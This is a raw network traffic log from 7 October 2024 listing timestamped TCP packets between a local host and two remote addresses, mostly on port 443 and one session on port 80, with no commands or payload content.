Oct 7, 2024 03:15:45.595158100 CEST	443	49867	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:45.595206976 CEST	443	49867	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:45.595279932 CEST	443	49867	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:45.595357895 CEST	49867	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:45.595690966 CEST	49867	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:45.595715046 CEST	443	49867	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:45.595726967 CEST	49867	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:45.595732927 CEST	443	49867	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:45.601037979 CEST	49872	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:45.601099968 CEST	443	49872	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:45.601177931 CEST	49872	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:45.601377964 CEST	49872	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:45.601401091 CEST	443	49872	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:45.612999916 CEST	443	49868	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:45.613316059 CEST	443	49868	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:45.613377094 CEST	49868	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:45.613379955 CEST	443	49868	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:45.613506079 CEST	49868	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:45.613506079 CEST	49868	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:45.613553047 CEST	49868	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:45.613570929 CEST	443	49868	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:45.616482973 CEST	49873	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:45.616571903 CEST	443	49873	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:45.616672993 CEST	49873	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:45.616878033 CEST	49873	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:45.616909981 CEST	443	49873	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:45.625863075 CEST	443	49869	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:45.625955105 CEST	443	49869	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:45.626020908 CEST	49869	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:45.626188040 CEST	49869	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:45.626207113 CEST	443	49869	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:45.626219988 CEST	49869	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:45.626226902 CEST	443	49869	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:45.628725052 CEST	49874	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:45.628762007 CEST	443	49874	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:45.628846884 CEST	49874	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:45.629082918 CEST	49874	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:45.629108906 CEST	443	49874	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:45.637650967 CEST	443	49870	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:45.637737036 CEST	443	49870	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:45.637873888 CEST	49870	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:45.637928963 CEST	49870	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:45.637942076 CEST	443	49870	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:45.637954950 CEST	49870	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:45.637960911 CEST	443	49870	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:45.640178919 CEST	49875	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:45.640234947 CEST	443	49875	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:45.640310049 CEST	49875	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:45.640444040 CEST	49875	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:45.640461922 CEST	443	49875	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:45.710963011 CEST	443	49871	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:45.711503983 CEST	49871	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:45.711544037 CEST	443	49871	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:45.711955070 CEST	49871	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:45.711961985 CEST	443	49871	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:45.812789917 CEST	443	49871	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:45.812932014 CEST	443	49871	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:45.812994003 CEST	49871	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:45.813021898 CEST	443	49871	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:45.813081026 CEST	443	49871	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:45.813257933 CEST	49871	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:45.813297987 CEST	49871	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:45.813297987 CEST	49871	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:45.813318014 CEST	443	49871	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:45.813328028 CEST	443	49871	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:45.816457033 CEST	49876	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:45.816515923 CEST	443	49876	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:45.816643953 CEST	49876	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:45.817090988 CEST	49876	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:45.817110062 CEST	443	49876	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:46.244358063 CEST	443	49872	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:46.245059013 CEST	49872	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:46.245091915 CEST	443	49872	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:46.245656013 CEST	49872	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:46.245662928 CEST	443	49872	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:46.251696110 CEST	443	49873	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:46.252171993 CEST	49873	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:46.252206087 CEST	443	49873	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:46.252795935 CEST	49873	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:46.252804041 CEST	443	49873	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:46.284377098 CEST	443	49875	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:46.285092115 CEST	49875	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:46.285116911 CEST	443	49875	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:46.285676956 CEST	49875	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:46.285685062 CEST	443	49875	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:46.306587934 CEST	443	49874	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:46.307178974 CEST	49874	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:46.307200909 CEST	443	49874	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:46.307846069 CEST	49874	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:46.307851076 CEST	443	49874	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:46.343328953 CEST	443	49872	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:46.343585014 CEST	443	49872	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:46.343641996 CEST	443	49872	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:46.343724966 CEST	49872	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:46.343725920 CEST	49872	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:46.343771935 CEST	443	49872	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:46.343787909 CEST	49872	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:46.343787909 CEST	49872	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:46.343796015 CEST	443	49872	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:46.343802929 CEST	443	49872	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:46.347595930 CEST	49877	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:46.347644091 CEST	443	49877	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:46.347863913 CEST	49877	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:46.348057985 CEST	49877	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:46.348071098 CEST	443	49877	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:46.350493908 CEST	443	49873	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:46.350657940 CEST	443	49873	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:46.350717068 CEST	443	49873	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:46.350795031 CEST	49873	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:46.350868940 CEST	49873	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:46.350888014 CEST	443	49873	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:46.350902081 CEST	49873	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:46.350908995 CEST	443	49873	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:46.353590012 CEST	49878	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:46.353617907 CEST	443	49878	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:46.353655100 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:46.353744984 CEST	49878	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:46.353744984 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:46.353935957 CEST	49878	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:46.353952885 CEST	443	49878	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:46.382738113 CEST	443	49875	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:46.382960081 CEST	443	49875	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:46.383035898 CEST	49875	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:46.383224010 CEST	49875	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:46.383248091 CEST	443	49875	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:46.387052059 CEST	49879	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:46.387094021 CEST	443	49879	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:46.387305975 CEST	49879	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:46.387923002 CEST	49879	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:46.387943029 CEST	443	49879	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:46.411309004 CEST	443	49874	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:46.411413908 CEST	443	49874	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:46.411514997 CEST	49874	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:46.411622047 CEST	49874	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:46.411638021 CEST	443	49874	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:46.411653042 CEST	49874	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:46.411659956 CEST	443	49874	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:46.414791107 CEST	49880	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:46.414832115 CEST	443	49880	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:46.414947033 CEST	49880	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:46.415163994 CEST	49880	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:46.415174007 CEST	443	49880	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:46.458604097 CEST	443	49876	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:46.465483904 CEST	49876	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:46.465511084 CEST	443	49876	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:46.466348886 CEST	49876	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:46.466356039 CEST	443	49876	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:46.561070919 CEST	443	49876	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:46.561233044 CEST	443	49876	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:46.561307907 CEST	49876	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:46.600135088 CEST	49876	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:46.600163937 CEST	443	49876	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:46.600181103 CEST	49876	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:46.600189924 CEST	443	49876	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:46.624483109 CEST	49881	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:46.624532938 CEST	443	49881	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:46.624603987 CEST	49881	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:46.626799107 CEST	49881	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:46.626812935 CEST	443	49881	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:46.801331997 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:46.806236982 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:46.999017954 CEST	443	49877	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:46.999805927 CEST	49877	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:46.999838114 CEST	443	49877	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:47.000411987 CEST	49877	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:47.000420094 CEST	443	49877	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:47.028098106 CEST	443	49878	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:47.029047966 CEST	49878	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:47.029088974 CEST	443	49878	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:47.029923916 CEST	49878	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:47.029932022 CEST	443	49878	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:47.033971071 CEST	443	49879	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:47.034682989 CEST	49879	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:47.034698009 CEST	443	49879	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:47.035196066 CEST	49879	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:47.035202980 CEST	443	49879	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:47.053070068 CEST	443	49880	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:47.053508043 CEST	49880	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:47.053545952 CEST	443	49880	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:47.054126978 CEST	49880	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:47.054142952 CEST	443	49880	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:47.099754095 CEST	443	49877	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:47.099853039 CEST	443	49877	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:47.099925995 CEST	49877	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:47.099960089 CEST	443	49877	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:47.099986076 CEST	443	49877	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:47.100052118 CEST	49877	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:47.100235939 CEST	49877	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:47.100254059 CEST	443	49877	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:47.103684902 CEST	49882	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:47.103743076 CEST	443	49882	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:47.103837013 CEST	49882	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:47.104353905 CEST	49882	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:47.104372978 CEST	443	49882	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:47.132450104 CEST	443	49878	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:47.132725000 CEST	443	49878	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:47.133059025 CEST	49878	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:47.133184910 CEST	49878	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:47.133197069 CEST	443	49878	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:47.133210897 CEST	49878	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:47.133219004 CEST	443	49878	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:47.134362936 CEST	443	49879	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:47.134452105 CEST	443	49879	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:47.134500027 CEST	443	49879	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:47.134521961 CEST	49879	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:47.134568930 CEST	49879	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:47.134730101 CEST	49879	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:47.134746075 CEST	443	49879	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:47.134756088 CEST	49879	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:47.134761095 CEST	443	49879	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:47.140427113 CEST	49883	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:47.140500069 CEST	443	49883	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:47.140598059 CEST	49883	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:47.141510010 CEST	49884	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:47.141540051 CEST	443	49884	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:47.141634941 CEST	49884	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:47.142020941 CEST	49884	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:47.142035007 CEST	443	49884	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:47.142070055 CEST	49883	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:47.142096996 CEST	443	49883	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:47.150825024 CEST	443	49880	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:47.150986910 CEST	443	49880	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:47.151447058 CEST	49880	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:47.151586056 CEST	49880	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:47.151616096 CEST	443	49880	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:47.151643991 CEST	49880	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:47.151659012 CEST	443	49880	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:47.155988932 CEST	49885	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:47.156028032 CEST	443	49885	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:47.156250954 CEST	49885	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:47.156672001 CEST	49885	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:47.156686068 CEST	443	49885	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:47.287559032 CEST	443	49881	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:47.352745056 CEST	49881	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:47.428766012 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:47.428814888 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:47.428957939 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:47.509598970 CEST	49881	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:47.509629965 CEST	443	49881	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:47.514154911 CEST	49881	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:47.514159918 CEST	443	49881	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:47.613148928 CEST	443	49881	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:47.613214970 CEST	443	49881	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:47.613276958 CEST	49881	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:47.613295078 CEST	443	49881	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:47.613327980 CEST	443	49881	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:47.613380909 CEST	49881	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:47.672168970 CEST	49881	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:47.672194004 CEST	443	49881	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:47.672207117 CEST	49881	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:47.672213078 CEST	443	49881	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:47.674499989 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:47.677738905 CEST	49886	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:47.677843094 CEST	443	49886	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:47.677932024 CEST	49886	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:47.678234100 CEST	49886	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:47.678271055 CEST	443	49886	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:47.679336071 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:47.769906044 CEST	443	49882	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:47.770495892 CEST	49882	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:47.770515919 CEST	443	49882	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:47.771172047 CEST	49882	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:47.771177053 CEST	443	49882	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:47.779738903 CEST	443	49884	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:47.780177116 CEST	49884	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:47.780194044 CEST	443	49884	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:47.780971050 CEST	49884	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:47.780980110 CEST	443	49884	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:47.797089100 CEST	443	49885	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:47.797574997 CEST	49885	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:47.797605038 CEST	443	49885	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:47.798264980 CEST	49885	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:47.798269987 CEST	443	49885	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:47.814294100 CEST	443	49883	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:47.814785004 CEST	49883	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:47.814841032 CEST	443	49883	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:47.815241098 CEST	49883	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:47.815253973 CEST	443	49883	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:47.871706009 CEST	443	49882	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:47.871881008 CEST	443	49882	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:47.871952057 CEST	49882	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:47.872220039 CEST	49882	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:47.872236967 CEST	443	49882	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:47.872247934 CEST	49882	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:47.872253895 CEST	443	49882	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:47.876025915 CEST	49887	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:47.876068115 CEST	443	49887	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:47.876137018 CEST	49887	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:47.876352072 CEST	49887	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:47.876370907 CEST	443	49887	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:47.877371073 CEST	443	49884	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:47.877708912 CEST	443	49884	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:47.877791882 CEST	49884	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:47.877830982 CEST	49884	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:47.877830982 CEST	49884	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:47.877844095 CEST	443	49884	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:47.877851963 CEST	443	49884	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:47.881280899 CEST	49888	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:47.881303072 CEST	443	49888	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:47.881369114 CEST	49888	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:47.881620884 CEST	49888	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:47.881633997 CEST	443	49888	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:47.895350933 CEST	443	49885	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:47.895545006 CEST	443	49885	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:47.895632029 CEST	49885	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:47.895682096 CEST	49885	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:47.895699978 CEST	443	49885	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:47.895711899 CEST	49885	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:47.895718098 CEST	443	49885	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:47.898844004 CEST	49889	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:47.898863077 CEST	443	49889	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:47.898942947 CEST	49889	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:47.899102926 CEST	49889	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:47.899116993 CEST	443	49889	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:47.919258118 CEST	443	49883	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:47.919332981 CEST	443	49883	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:47.919502020 CEST	49883	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:47.920147896 CEST	49883	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:47.920186996 CEST	443	49883	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:47.920217991 CEST	49883	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:47.920234919 CEST	443	49883	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:47.925144911 CEST	49890	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:47.925167084 CEST	443	49890	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:47.925230026 CEST	49890	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:47.925858021 CEST	49890	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:47.925868988 CEST	443	49890	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:48.307862997 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:48.307879925 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:48.307938099 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:48.307939053 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:48.318156958 CEST	443	49886	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:48.318783998 CEST	49886	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:48.318824053 CEST	443	49886	13.107.246.45	192.168.2.5
